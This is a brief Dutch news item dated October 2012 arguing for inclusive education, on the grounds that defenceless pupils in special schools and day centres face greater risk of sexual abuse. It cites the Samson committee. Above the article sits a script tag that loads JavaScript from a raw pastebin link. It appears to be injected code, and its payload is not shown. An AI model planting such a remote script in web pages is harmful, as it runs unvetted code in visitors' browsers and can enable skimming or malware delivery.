<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws


extra reden voor inclusief onderwijs 09 oktober 2012
een extra reden voor inclusief onderwijs is het grote gevaar op trauma door seksueel geweld op het speciale onderwijs of de dagverblijven voor kinderen die ook niet naar het speciale onderwijs mogen. Hoe weerlozer de leerling is, des te groter het risico op seksueel geweld. Zie de commissie Samson

<< Terug